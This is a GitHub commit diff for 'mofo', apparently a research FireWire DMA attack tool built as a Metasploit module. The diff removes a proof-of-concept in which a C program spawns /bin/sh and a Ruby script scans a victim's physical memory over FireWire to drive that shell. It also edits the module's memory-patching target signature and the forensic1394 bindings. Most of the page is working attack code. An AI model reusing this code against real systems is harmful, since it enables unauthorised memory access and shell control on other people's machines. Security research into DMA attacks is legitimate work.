Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

Added rough installation instructions

Removed up some unused files
removed fu
  • Loading branch information...
commit 895172cadeebe2f81372310620dfa21c113d084d 1 parent 86761d7
dma authored
View
6 README
@@ -7,7 +7,7 @@ An explanation of our work can be found in our paper: "mofo-final.pdf".
#### INSTALLATION INSTRUCTIONS ####
#install prerequisites
-sudo apt-get install cmake
+sudo apt-get install cmake git build-essential
# Fetch, build and install libforensic1394
git clone git://git.freddie.witherden.org/forensic1394.git
@@ -20,8 +20,8 @@ cd ..
# install ffi gem
#TODO: there has got to be a better way
sudo apt-get install ruby1.9.1-dev
-gem1.9.1 install ffi
-cp -r /var/lib/gems/1.9.1/gems/ffi-1.0.11 /opt/metasploit-4.1.4/ruby/lib/ruby/gems/1.9.1/gems/
+sudo gem1.9.1 install ffi
+sudo cp -r /var/lib/gems/1.9*/gems/ffi-1* /opt/metasploit-4*/ruby/lib/ruby/gems/1.9*/gems/
# install mofo
git clone git@github.com:mrbreaker/mofo.git
View
102 channel-poc/channel.c
@@ -1,102 +0,0 @@
-#include <sys/mman.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <stdbool.h>
-#include <unistd.h>
-#include <fcntl.h>
-#include <errno.h>
-
-#pragma pack(1)
-
-#define BUFFER_SIZE 255
-#define PATTERN_SIZE 16
-#define CACHE_SIZE ( 10 * 1024 * 1024 )
-#define SEND_MASTER '^'
-#define SEND_SLAVE '~'
-
-struct msg {
- char pattern[PATTERN_SIZE];
- volatile char flags;
- volatile unsigned char len;
- char data[BUFFER_SIZE];
-};
-typedef struct msg message;
-
-message* initMessage(){
- int i;
- message *p;
-
- p = mmap(NULL,sizeof(message),PROT_WRITE|PROT_READ,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
- if(p == (void*)-1)
- puts("mmap failed");
-
- memcpy(p->pattern,"81d2ec67g412df64",PATTERN_SIZE);
-
- for(i=0;i<PATTERN_SIZE;i++)
- p->pattern[i]-=1;
-
- p->flags = SEND_SLAVE;
- return p;
-}
-
-void blockMessage(message *m){
- while(1)
- if(m->flags != SEND_SLAVE)
- return;
-}
-
-int main(int argc,char **argv){
- int fdstdin[2];
- int fdstdout[2];
- int oldstdin;
- int oldstdout;
- message* m;
- m = initMessage();
- if(pipe(fdstdin))
- perror("creating pipe failed");
-
- if(pipe(fdstdout))
- perror("creating pipe failed");
-
- fcntl(fdstdin[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdin[1],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[0],F_SETFL,O_NONBLOCK);
- fcntl(fdstdout[1],F_SETFL,O_NONBLOCK);
-
- oldstdin=dup(fileno(stdin));
- close(fileno(stdin));
-
- oldstdout=dup(fileno(stdout));
- close(fileno(stdout));
-
- dup2(fdstdin[0], fileno(stdin));
- dup2(fdstdout[1], fileno(stdout));
-
- if(fork()){
- //parent
- dup2(oldstdin, fileno(stdin));
- dup2(oldstdout, fileno(stdout));
-
- while(1){
- int len;
- blockMessage(m);
- write(fdstdin[1], m->data, m->len);
- write(fileno(stdout), m->data, m->len);
- if ((len = read(fdstdout[0], m->data, BUFFER_SIZE)) == -1)
- m->len = 0;
- else
- m->len = len;
-
- m->flags = SEND_SLAVE;
- puts ("###################################");
- }
- }else{
- //child
- char *args = NULL;
- dup2(fileno(stdout), fileno(stderr));
- execvp("/bin/sh",&args);
- }
- return 0;
-}
-
View
119 channel-poc/channel.rb
@@ -1,119 +0,0 @@
-#!/usr/bin/env ruby
-require '../forensic1394/bus'
-require 'pp'
-require 'fcntl'
-
-
-def run(context)
- # first 17 characters of md5sum of awesome with the 9 removed
- sig = "70c1db56f301ce55"
- off = 0x00
-
- # Print phase, method and patch parameters
- puts ' Using signature: %s' % sig
- puts ' Using offset: %x' % off
-
- # Initialize
- d = initialize_fw(d)
-
- # Find memory size
- puts 'Detecting memory size...'
- memsize = 4 * 1024 * 1024 * 1024
- puts '%d MiB main memory detected' % (Integer(memsize)/(1024 * 1024))
-
- # Attack
- puts 'Starting attack...'
- begin
- # Find
- addr = findsig(d, sig, off, memsize)
- if !addr
- settings.success = False
- else
- puts '+ Signature found at 0x%x.' % addr
- while (1)
- data = ''
- begin
- STDIN.flush
- data = STDIN.read_nonblock(255)
- rescue
- data = ''
- end
- d.write(addr + 18, data)
- d.write(addr + 17, sprintf("%c", data.length))
- d.write(addr + 16, '^')
- while (d.read(addr + 16, 1) != '~')
- sleep(1)
- end
- len = d.read(addr + 17, 1)
- data = d.read(addr + 18, len.ord)
- print data
- end
- end
- rescue IOError => e
- success = false
- puts '-', 'I/O Error, make sure FireWire interfaces are properly connected.'
- puts e.message
- end
-
- if !success
- fail('Failed to dump.')
- end
-
-
- if not settings.success
- fail('Signature not found.')
- end
-end
-
-def initialize_fw(d)
- b = Bus.new
- # Enable SBP-2 support to ensure we get DMA
- b.enable_sbp2()
-
- begin
- for i in 3.downto(1)
- puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
- STDOUT.flush
- sleep(1)
- end
- rescue
- puts 'Interrupted'
- end
-
- # Open the first device
- d = b.devices
-
- if (d.length > 0)
- d = d[0]
- d.open()
- puts ''
- else
- raise 'nothing connected'
- end
-
- return d
-end
-
-def findsig(d, sig, off, memsize)
- pagesize = 4096
- one_mb = 1 * 1024 * 1024
- for addr in (one_mb + off..memsize).step(pagesize)
- data = d.read(addr, sig.length)
- if (data == sig)
- return addr
- end
- end
- print()
- return
-end
-
-def fail(msg)
- puts "\n [!] Attack unsuccessful."
- puts msg
- exit
-end
-
-if __FILE__ == $0
- run( ARGV )
-end
-
View
11 channel-poc/spam.c
@@ -1,11 +0,0 @@
-#include <string.h>
-#include <stdlib.h>
-
-int main(int argc,char** argv){
- char *ptr;
- char i;
- for(;;i++){
- ptr = malloc(16);
- memset(ptr,i,16);
- }
-}
View
81 forensic1394/device.rb
@@ -49,7 +49,7 @@ def initialize (bus, devptr)
@vendor_id = Forensic1394.get_device_vendor_id(@devptr)
@request_size = Forensic1394.get_device_request_size(@devptr)
- @csr = FFI::Buffer.new(4, 256, true)
+ @csr = FFI::MemoryPointer.new(4, 256, true)
Forensic1394.get_device_csr(@devptr, @csr)
end
@@ -68,7 +68,7 @@ def setStale(stale)
# device is stale, an exception raised.
def open
- checkStale()
+ checkStale
process_result(Forensic1394.open_device(@devptr), 'Forensic1394.open_device')
end
@@ -85,7 +85,7 @@ def close
# Checks to see if the device is open or not, returning a boolean value.
# In the case of a stale handle false is returned.
- def isOpen
+ def isopen
if @stale
return false
else
@@ -98,18 +98,55 @@ def isOpen
# The device must be open and the handle can not be stale.
# Requests larger than @request_size will automatically be
# broken down into smaller chunks. The resulting data is
- # returned.
+ # returned. An exception is raised should an error occur. The
+ # optional buf parameter can be used to pass a specific ctypes
+ # c_char array to read into. If no buffer is passed then
+ # create_string_buffer will be used to allocate one.
- def read (addr, numb)
+ def read (addr, numb, buf=nil)
+ if buf == nil
+ # No buffer passed; allocate one
+ buf = FFI::MemoryPointer.new(1, numb, true)
+ else
+ raise "IMPLEMENT ME"
+ end
+
# Break the request up into rs size chunks; if numb % rs = 0 then
# lens may have an extra element; zip will take care of this
rs = @request_size
addrs = (addr..addr + numb).step(rs)
lens = [rs] * (Integer(numb) / Integer(rs)) + [numb % rs]
- return readreq(addrs.zip(lens))
- #buf = FFI::Buffer.new(1, numb, true)
- #readreq(addrs.zip(lens), buf)
- #return buf.get_bytes(0,numb)
+ readreq(addrs.zip(lens), buf)
+ return buf.get_bytes(0,numb)
+ end
+
+ ##
+ # Performs a batch of read requests of the form: [(addr1, len1),
+ # (addr2, len2), ...] and returns a generator yielding, in
+ # sequence, (addr1, buf1), (addr2, buf2), ..., . This is useful
+ # when performing a series of `scatter reads' from a device.
+
+ def readv (req)
+ checkStale()
+ # Create the request buffer
+ sum = 0
+ for addr, numb in req
+ sum += numb
+ end
+ buf = FFI::MemoryPointer.new(1, sum, true)
+
+ # Use readreq to read the requests into buf
+ readreq(req, buf)
+
+ # Generate the resulting buffers
+ off = 0
+ answers = []
+ for addr, numb in req
+ answers << [[addr, buf.get_pointer(off)]]
+ off += numb
+ end
+
+ return answers
end
##
@@ -119,7 +156,7 @@ def read (addr, numb)
# chunks. Uses writev internally.
def write (addr, buf)
- checkStale()
+ checkStale
# Break up the request
req = []
(0..buf.size).step(@request_size) do |off|
@@ -135,16 +172,15 @@ def write (addr, buf)
def writev (req)
checkStale()
- if isOpen() == 0
+ if isopen() == 0
raise "Forensic1394Exception", "not open"
end
# Prepare the request array(addr, len, buf)
for addr, buf in req
creq = Forensic1394::Req.new()
- b = FFI::MemoryPointer.new(:char,buf.size);
- b.write_array_of_char(buf.to_s)
-
+ b = FFI::MemoryPointer.new(1, buf.size, true)
+ b.put_bytes(0, buf.to_s)
creq[:addr]=addr
creq[:len]=buf.size
creq[:buf]= b
@@ -215,29 +251,24 @@ def csr
##
# Internal low level read function.
- def readreq(req)
- if isOpen() == 0
+ def readreq (req, buf)
+ if isopen() == 0
raise Forensic1394Exception, "not open"
end
+ # Create the request tuples
off = 0
- buf = ""
for addr, numb in req
- #set up the struct for passing
creq = Forensic1394::Req.new
creq[:addr] = addr
creq[:len]=numb
-
- b = FFI::MemoryPointer.new(:char,numb)
- creq[:buf]= b
-
- # Dispatch the request
+ creq[:buf]= buf.slice(off, numb)
+
+ # Dispatch the requests
status = Forensic1394.read_device_v(@devptr, creq, 1)
- buff += b.read_array_of_char()
process_result(status, "Forensic1394.read_device_v")
off += numb
end
- return buff
end
end
View
6 module/mofo.rb
@@ -29,7 +29,9 @@ def initialize(info = {})
'Arch' => ARCH_X86,
'Targets' =>
[
- [ 'Ubuntu 11.10', { 'Offset' => 0x540, 'Signature' => "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ [ 'Ubuntu 11.10', { 'Offset' => 0x590, 'Signature' =>
+ # "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24\x70\x73\x05\x08\xe8\x3e\x53\xff\xff\x83\xc4\x24\x31\xc0\x5b\x5e", 'Space' => 75 } ],
+ "\x74\x1e\x89\x5c\x24\x04\xc7\x04\x24", 'Space' => 75 } ],
# [ 'Ubuntu 11.10', { 'Offset' => 0x4f2, 'Signature' => "8B430C8B501C895424048B40", 'Space' => 75 } ],
],
'DefaultTarget' => 0,
@@ -108,7 +110,7 @@ def initialize_fw(b, d)
b.enable_sbp2()
begin
- for i in 3.downto(1)
+ for i in 4.downto(1)
puts "[+] Initializing bus and enabling SBP2, please wait %2d seconds or press Ctrl+C \r" % i;
STDOUT.flush
sleep(1)
Please sign in to comment.
Something went wrong with that request. Please try again.